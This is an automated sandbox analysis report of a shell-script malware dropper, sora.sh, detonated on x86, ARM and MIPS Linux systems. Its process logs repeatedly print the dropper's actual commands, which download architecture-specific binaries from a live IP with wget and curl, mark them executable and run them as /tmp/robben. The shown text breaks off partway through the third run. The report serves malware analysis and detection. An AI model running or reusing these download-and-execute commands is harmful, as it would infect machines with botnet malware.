Analysis Overview
SHA256
c4575e4be3ce1429bf36332d68ad7aa6612852748f0a94067e6936433c26f344
Threat Level: Shows suspicious behavior
The file sora.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-29 20:35
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-29 20:35
Reported
2024-08-29 20:38
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
4s
Max time network
133s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mips]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i468]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i686]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm5]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm6]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm7]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.m68k]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.sh4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 224.0.0.251:5353 | | udp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| GB | 195.181.164.17:443 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-29 20:35
Reported
2024-08-29 20:38
Platform
debian9-armhf-20240611-en
Max time kernel
31s
Max time network
35s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mips]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i468]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i686]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm5]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm6]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm7]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.m68k]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.sh4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-29 20:35
Reported
2024-08-29 20:36
Platform
debian9-mipsbe-20240729-en
Max time kernel
31s
Max time network
32s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mips]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i468]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i686]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm5]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm6]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
